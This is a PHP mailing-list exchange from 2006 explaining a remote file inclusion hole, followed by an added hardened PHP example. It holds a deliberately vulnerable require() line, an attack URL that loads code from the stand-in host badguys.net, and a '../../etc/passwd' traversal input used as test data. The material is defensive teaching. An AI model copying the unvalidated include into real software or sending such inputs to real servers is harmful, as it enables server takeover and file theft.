Re: Fwd: [PHP] Highjack?



At 9:13 PM +0000 11/14/06, Stut wrote:
Ok, so badscript.php is a bad name for this script. Let's say show.php is a script you've written. You were tired, the kids were running around you screaming and shouting, and you wrote something like the following without really thinking about it...

<?php
// $_GET['path'] is attacker-controlled and is concatenated straight into the include path
require($_GET['path'].'commonfuncs.inc.php');
// Do other stuff here, using functions in commonfuncs.inc.php
?>

The *bad guy* can now hit the URL...

http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=

This causes show.php to include (i.e. execute!!) the remote file injectionscript.txt from badguys.net at this URL...

http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php

Since this gets executed on your server it can do anything one of your scripts can do. The only symptom would be that show.php will not work for that request. Do the bad guys care? Probably not, because by the time it fails they've already replaced your index.php and potentially installed a rootkit, backdoors and whatever else (depending, of course, on how locked down the web server is and your file permissions).

Hope that makes sense now.

-Stut

-Stut:

Yes, I believe that the "require($_GET[])" is one of the things Chris Shiflett talks about in his book. I should have guessed that was what everyone was talking about. But, considering that I never do that and my site was hijacked, I was thinking it must have been something different.

It all makes sense now.

Sorry for being so dense.

Thanks everyone.

tedd

PS: My kids are too old to scream -- it's grand-kids now.

--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
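The include path that show.php's require() really evaluates for the attacker's ?path= value, beside a hardened resolver, as an added example; this is not code from Stut's or tedd's posts. buildIncludePath, looksLikeWrapper, resolveInclude, the 'default' key, the lib/ sub-directory and the temporary base directory are all hypothetical names chosen for the illustration.

```php
<?php
// Added example (not from the original thread): what the vulnerable
// require($_GET['path'].'commonfuncs.inc.php') line feeds to PHP, and a
// hardened replacement. All file and directory names are hypothetical.

// Exactly what the vulnerable line passes to require().
function buildIncludePath(string $path): string
{
    return $path . 'commonfuncs.inc.php';
}

// True if the string starts with a scheme (http://, ftp://, php://, data:,
// ...) and so would be handed to a stream wrapper rather than opened as a
// plain filesystem path. Heuristic only: a Windows drive letter also matches.
function looksLikeWrapper(string $path): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*:#i', $path);
}

// Hardened replacement: the client may only choose a key from a fixed
// allowlist, the key maps to a file under $baseDir, and the resolved path
// is checked with realpath() to make sure it did not escape $baseDir.
function resolveInclude(string $key, string $baseDir): ?string
{
    $allowed = ['default' => 'lib/commonfuncs.inc.php']; // hypothetical map
    if (!isset($allowed[$key])) {
        return null;                       // URLs, ../, unknown keys all stop here
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $allowed[$key]);
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // missing file, or resolved outside the base
    }
    return $file;
}

// Constructed inputs: the attacker's value from the post and a normal one.
$attackerPath = 'http://badguys.net/injectionscript.txt?ignored=';
$normalPath   = 'lib/';

foreach ([$normalPath, $attackerPath] as $p) {
    $target = buildIncludePath($p);
    printf("require(%s) -> %s\n", var_export($p, true),
        looksLikeWrapper($target) ? "REMOTE via stream wrapper: $target"
                                  : "local file: $target");
}

// Hardened version, tried against a throwaway base directory that holds a
// stub commonfuncs.inc.php so realpath() has something to resolve.
$baseDir = sys_get_temp_dir() . '/showphp_' . bin2hex(random_bytes(4));
mkdir($baseDir . '/lib', 0700, true);
file_put_contents($baseDir . '/lib/commonfuncs.inc.php', "<?php\n// stub helper\n");

foreach (['default', $attackerPath, '../../etc/passwd'] as $key) {
    $resolved = resolveInclude($key, $baseDir);
    printf("resolveInclude(%s) -> %s\n", var_export($key, true), $resolved ?? 'REJECTED');
}

// Clean up the temporary directory.
unlink($baseDir . '/lib/commonfuncs.inc.php');
rmdir($baseDir . '/lib');
rmdir($baseDir);
```

Run it with `php show-example.php` (any filename works). The first loop prints the attacker's full URL, ending in commonfuncs.inc.php, which is what the original line would hand to require(); the second loop shows the allowlisted resolver accepting only the known key and rejecting both the URL and a traversal attempt. One caveat on the remote case: since PHP 5.2, including an http:// URL also requires allow_url_include=On (allow_url_fopen alone is no longer enough), but the same unvalidated require still allows local file inclusion through ../ paths, so the allowlist-plus-realpath check is the fix either way.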